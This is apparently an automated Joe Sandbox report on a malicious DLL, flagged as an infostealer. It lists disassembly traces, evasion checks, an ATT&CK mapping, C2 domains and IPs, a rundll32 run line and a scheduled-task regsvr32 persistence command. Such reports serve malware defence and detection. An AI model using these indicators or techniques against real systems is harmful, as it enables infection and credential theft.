            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D3FF4 mov ecx, dword ptr fs:[00000030h]36_2_7F0D3FF4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov edx, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov ecx, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov edx, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F0FF0 mov eax, dword ptr fs:[00000030h]36_2_7F0F0FF0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F139E06 mov eax, dword ptr fs:[00000030h]36_2_7F139E06
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F139E7B mov eax, dword ptr fs:[00000030h]36_2_7F139E7B
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov ecx, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov ecx, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EF690 mov eax, dword ptr fs:[00000030h]36_2_7F0EF690
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0E6540 mov eax, dword ptr fs:[00000030h]36_2_7F0E6540
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov edx, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov ecx, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov edx, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0F6D40 mov eax, dword ptr fs:[00000030h]36_2_7F0F6D40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0FAD50 mov ecx, dword ptr fs:[00000030h]36_2_7F0FAD50
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10BD70 mov eax, dword ptr fs:[00000030h]36_2_7F10BD70
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10ADB0 mov ecx, dword ptr fs:[00000030h]36_2_7F10ADB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10ADB0 mov eax, dword ptr fs:[00000030h]36_2_7F10ADB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10ADB0 mov ecx, dword ptr fs:[00000030h]36_2_7F10ADB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10ADB0 mov edx, dword ptr fs:[00000030h]36_2_7F10ADB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10ADB0 mov eax, dword ptr fs:[00000030h]36_2_7F10ADB0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10E5D0 mov ecx, dword ptr fs:[00000030h]36_2_7F10E5D0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108C30 mov ecx, dword ptr fs:[00000030h]36_2_7F108C30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108C30 mov eax, dword ptr fs:[00000030h]36_2_7F108C30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108C30 mov edx, dword ptr fs:[00000030h]36_2_7F108C30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108C30 mov eax, dword ptr fs:[00000030h]36_2_7F108C30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108C30 mov ecx, dword ptr fs:[00000030h]36_2_7F108C30
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D6C2A mov eax, dword ptr fs:[00000030h]36_2_7F0D6C2A
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D8440 mov edx, dword ptr fs:[00000030h]36_2_7F0D8440
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D8440 mov ecx, dword ptr fs:[00000030h]36_2_7F0D8440
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D8440 mov ecx, dword ptr fs:[00000030h]36_2_7F0D8440
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F107460 mov eax, dword ptr fs:[00000030h]36_2_7F107460
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D44E4 mov ecx, dword ptr fs:[00000030h]36_2_7F0D44E4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D44E4 mov ecx, dword ptr fs:[00000030h]36_2_7F0D44E4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D44E4 mov edx, dword ptr fs:[00000030h]36_2_7F0D44E4
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0FC4F0 mov ecx, dword ptr fs:[00000030h]36_2_7F0FC4F0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F109B40 mov eax, dword ptr fs:[00000030h]36_2_7F109B40
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10BB90 mov edx, dword ptr fs:[00000030h]36_2_7F10BB90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10BB80 mov eax, dword ptr fs:[00000030h]36_2_7F10BB80
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D6B90 mov eax, dword ptr fs:[00000030h]36_2_7F0D6B90
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F121A50 mov eax, dword ptr fs:[00000030h]36_2_7F121A50
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F116240 mov ecx, dword ptr fs:[00000030h]36_2_7F116240
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F116240 mov edx, dword ptr fs:[00000030h]36_2_7F116240
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F116240 mov eax, dword ptr fs:[00000030h]36_2_7F116240
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F116240 mov ecx, dword ptr fs:[00000030h]36_2_7F116240
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0EAAE0 mov ecx, dword ptr fs:[00000030h]36_2_7F0EAAE0
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F108930 mov eax, dword ptr fs:[00000030h]36_2_7F108930
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F0D6980 mov edx, dword ptr fs:[00000030h]36_2_7F0D6980
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F10C060 mov ecx, dword ptr fs:[00000030h]36_2_7F10C060
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EDB6280 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapReAlloc,13_2_7EDB6280
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_6CF92EFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_6CF92EFD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE03887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_7EE03887
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE07713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_7EE07713
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7E3AD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_7F7E3AD5
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7E3887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_7F7E3887
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7E7713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_7F7E7713
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_6B542EFD SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_6B542EFD
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F127713 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_7F127713
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F123AD5 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,36_2_7F123AD5
            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 36_2_7F123887 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,36_2_7F123887

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\SysWOW64\regsvr32.exeNetwork Connect: 194.67.193.12 443
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.67.193.13 443Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\useraccount.aspx.dll",#1Jump to behavior
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_7EE0363C cpuid 13_2_7EE0363C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,13_2_7EE1CEEA
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,13_2_7EE1CAE3
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,13_2_7EE1CA48
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,13_2_7EE1681C
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,13_2_7EE1C9FD
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,13_2_7EE1C75B
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,13_2_7EE1629F
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,13_2_7EE1D0BF
            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 18_2_7F7F0FF4 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,18_2_7F7F0FF4
            Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
            Windows Management Instrumentation
            1
            DLL Side-Loading
            111
            Process Injection
            1
            Masquerading
            OS Credential Dumping1
            System Time Discovery
            Remote Services1
            Archive Collected Data
            11
            Encrypted Channel
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts2
            Native API
            Boot or Logon Initialization Scripts1
            DLL Side-Loading
            131
            Virtualization/Sandbox Evasion
            LSASS Memory151
            Security Software Discovery
            Remote Desktop ProtocolData from Removable Media11
            Non-Standard Port
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)111
            Process Injection
            Security Account Manager131
            Virtualization/Sandbox Evasion
            SMB/Windows Admin SharesData from Network Shared Drive2
            Ingress Tool Transfer
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
            Deobfuscate/Decode Files or Information
            NTDS1
            Application Window Discovery
            Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
            Obfuscated Files or Information
            LSA Secrets1
            System Network Configuration Discovery
            SSHKeylogging4
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Rundll32
            Cached Domain Credentials125
            System Information Discovery
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
            DLL Side-Loading
            DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1521032 Sample: useraccount.aspx.dll Startdate: 28/09/2024 Architecture: WINDOWS Score: 100 43 sumonare.com 2->43 45 baruopas.com 2->45 53 Multi AV Scanner detection for domain / URL 2->53 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 6 other signatures 2->59 10 loaddll32.exe 1 2->10         started        12 regsvr32.exe 2->12         started        14 regsvr32.exe 2->14         started        signatures3 process4 process5 16 rundll32.exe 12 10->16         started        21 rundll32.exe 10->21         started        23 rundll32.exe 6 10->23         started        27 18 other processes 10->27 25 regsvr32.exe 12->25         started        dnsIp6 39 baruopas.com 194.67.193.13, 443, 49700 IHOR-ASRU Russian Federation 16->39 37 C:\Users\user\8f08\user-PC\user-PC.ocx, PE32 16->37 dropped 47 System process connects to network (likely due to code injection or exploit) 16->47 49 Found evasive API chain (may stop execution after checking mutex) 21->49 51 Found evasive API chain (may stop execution after checking locale) 21->51 41 sumonare.com 194.67.193.12, 443, 4433, 49701 IHOR-ASRU Russian Federation 23->41 29 rundll32.exe 27->29         started        31 WerFault.exe 27->31         started        file7 signatures8 process9 process10 33 MpCmdRun.exe 29->33         started        process11 35 conhost.exe 33->35         started       

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand
            SourceDetectionScannerLabelLink
            useraccount.aspx.dll27%VirustotalBrowse
            SourceDetectionScannerLabelLink
            C:\Users\user\8f08\user-PC\user-PC.ocx18%ReversingLabsWin32.Infostealer.Tinba
            C:\Users\user\8f08\user-PC\user-PC.ocx27%VirustotalBrowse
            No Antivirus matches
            SourceDetectionScannerLabelLink
            baruopas.com5%VirustotalBrowse
            sumonare.com5%VirustotalBrowse
            SourceDetectionScannerLabelLink
            https://sumonare.com/5%VirustotalBrowse
            https://sumonare.com/projects/index.aspx6%VirustotalBrowse
            https://baruopas.com/projects/useraccount.aspx5%VirustotalBrowse
            NameIPActiveMaliciousAntivirus DetectionReputation
            baruopas.com
            194.67.193.13
            truetrueunknown
            sumonare.com
            194.67.193.12
            truetrueunknown
            NameMaliciousAntivirus DetectionReputation
            http://sumonare.com/projects/cloud-solutions/api-v2/index.phptrue
              unknown
              https://baruopas.com/projects/useraccount.aspxtrueunknown
              https://sumonare.com/projects/index.aspxtrueunknown
              NameSourceMaliciousAntivirus DetectionReputation
              https://sumonare.com/rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpfalseunknown
              https://sumonare.com/projects/index.aspxh=rundll32.exe, 0000000D.00000002.2505715458.00000000031C7000.00000004.00000020.00020000.00000000.sdmpfalse
                unknown
                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs
                IPDomainCountryFlagASNASN NameMalicious
                194.67.193.12
                sumonare.comRussian Federation
                35196IHOR-ASRUtrue
                194.67.193.13
                baruopas.comRussian Federation
                35196IHOR-ASRUtrue
                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1521032
                Start date and time:2024-09-28 03:21:04 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 8m 34s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:43
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:useraccount.aspx.dll
                Detection:MAL
                Classification:mal100.troj.evad.winDLL@52/7@3/2
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:Failed
                Cookbook Comments:
                • Found application associated with file extension: .dll
                • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
                • Excluded IPs from analysis (whitelisted): 20.189.173.20
                • Excluded domains from analysis (whitelisted): login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                TimeTypeDescription
                03:22:08Task SchedulerRun new task: {CBE5507F-5712-42EB-982A-929D4F635485} path: C:\Windows\System32\regsvr32.exe s>-e -n -i:"C:\Users\user\8f08\user-PC\user-PC.ocx" "C:\Users\user\8f08\user-PC\user-PC.ocx"
                21:22:07API Interceptor1x Sleep call for process: loaddll32.exe modified
                23:04:23API Interceptor97x Sleep call for process: rundll32.exe modified
                23:04:33API Interceptor1x Sleep call for process: WerFault.exe modified
                23:04:54API Interceptor1x Sleep call for process: MpCmdRun.exe modified
                No context
                No context
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                IHOR-ASRUDocument-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                • 193.124.185.116
                x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                • 193.124.185.116
                x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                gts.exeGet hashmaliciousUnknownBrowse
                • 193.109.120.133
                gts.exeGet hashmaliciousUnknownBrowse
                • 193.109.120.133
                NEW_DESIGN_SPECIFICATION_SAMPLE_DRAWINGS.cmdGet hashmaliciousUnknownBrowse
                • 193.124.185.91
                file.dllGet hashmaliciousMatanbuchusBrowse
                • 194.67.193.73
                IHOR-ASRUDocument-21-41-00.jsGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                CITROEN.msiGet hashmaliciousBazar Loader, BruteRatelBrowse
                • 193.124.185.116
                x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                7ii6VB6bo3.dllGet hashmaliciousBruteRatel, LatrodectusBrowse
                • 193.124.185.116
                x64_stealth.dll.dllGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                DLPAgent.msiGet hashmaliciousBazar Loader, BruteRatel, LatrodectusBrowse
                • 193.124.185.116
                gts.exeGet hashmaliciousUnknownBrowse
                • 193.109.120.133
                gts.exeGet hashmaliciousUnknownBrowse
                • 193.109.120.133
                NEW_DESIGN_SPECIFICATION_SAMPLE_DRAWINGS.cmdGet hashmaliciousUnknownBrowse
                • 193.124.185.91
                file.dllGet hashmaliciousMatanbuchusBrowse
                • 194.67.193.73
                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                37f463bf4616ecd445d4a1937da06e19file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • 194.67.193.12
                • 194.67.193.13
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • 194.67.193.12
                • 194.67.193.13
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, Stealc, VidarBrowse
                • 194.67.193.12
                • 194.67.193.13
                file.exeGet hashmaliciousLummaC, RDPWrap Tool, LummaC Stealer, VidarBrowse
                • 194.67.193.12
                • 194.67.193.13
                SecuriteInfo.com.Win32.Malware-gen.4932.17674.exeGet hashmaliciousGuLoaderBrowse
                • 194.67.193.12
                • 194.67.193.13
                Cortex.exeGet hashmaliciousUnknownBrowse
                • 194.67.193.12
                • 194.67.193.13
                Cortex.exeGet hashmaliciousUnknownBrowse
                • 194.67.193.12
                • 194.67.193.13
                file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 194.67.193.12
                • 194.67.193.13
                file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 194.67.193.12
                • 194.67.193.13
                file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                • 194.67.193.12
                • 194.67.193.13
                No context
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):65536
                Entropy (8bit):0.8388982118168936
                Encrypted:false
                SSDEEP:192:jCiZOo7g70BU/wjeT7zuiFdZ24IO8dci:eiw8gIBU/wjePzuiFdY4IO8dci
                MD5:552239641C71C7357856D4DB281D7732
                SHA1:F8ABF4FBBD47779F8E7F3AA7FB3AB07E3C376CBD
                SHA-256:26B79A555AE2E25A204F1A5D3517468A619909241F3C37C758060462B882D8A6
                SHA-512:CBB03D9B46CB6E026EFFEFC39DB736EA00B31F88CB05AD3268BC1842953F12109CBCC78D56F5935B28B28DB3B0EE51C1A20BC45146FA3E5F150842D6A5350F1A
                Malicious:false
                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.1.9.6.0.1.2.8.5.0.6.4.3.2.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.1.9.6.0.1.3.0.4.1.2.6.8.4.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.3.3.2.f.b.f.-.2.f.3.6.-.4.6.9.b.-.9.e.3.3.-.7.3.f.b.d.0.9.a.f.9.5.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.e.8.7.f.5.3.3.-.5.6.d.7.-.4.a.7.c.-.8.0.5.c.-.6.a.f.9.6.e.c.d.c.9.9.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.a.0.-.0.0.0.1.-.0.0.1.4.-.9.8.5.8.-.0.4.d.5.4.4.1.1.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.8.f.a.8.8.9.e.4.5.6.a.a.6.4.6.a.4.d.0.a.4.3.4.9.9.7.7.4.3.0.c.e.5.f.a.5.e.
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:Mini DuMP crash report, 14 streams, Sat Sep 28 01:22:09 2024, 0x1205a4 type
                Category:dropped
                Size (bytes):46890
                Entropy (8bit):2.1035911906124873
                Encrypted:false
                SSDEEP:192:c3Uno8a2N+ZtO5H40GjNAGioqBg2/jdMj4IRnmpswpOB:rok35H5U9q2IJMj4IR/
                MD5:AC4B4AA4D4F8B69E29BB2CEAFD5951A9
                SHA1:A2F2651286528424A7B2069513A58E5B77106F03
                SHA-256:809F9B420CC72F33F09F05DC9616FEA3958F19637D4D54B4ECB473F32A405BE3
                SHA-512:0D4B58DA1DA33BC6F6F5CFD01DE1266B52E27544B52BA16D6A42489DF92BE17009F45620839AC53DD09791953638351C751E348844F9C980C049BD9DCDDE0067
                Malicious:false
                Preview:MDMP..a..... .......AZ.f........................\...............r'..........T.......8...........T...........p...........................................................................................................eJ......|.......GenuineIntel............T...........>Z.f.............................0..1...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                Process:C:\Windows\SysWOW64\WerFault.exe
                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                Category:dropped
                Size (bytes):8286
                Entropy (8bit):3.698077761121209
                Encrypted:false
                SSDEEP:192:R6l7wVeJro6Ieg0ph6Yxb6SaegmfT64sgpprn89b1qsfcHm:R6lXJE6Ieg0ph6Y96SbgmfT64sJ1JfB
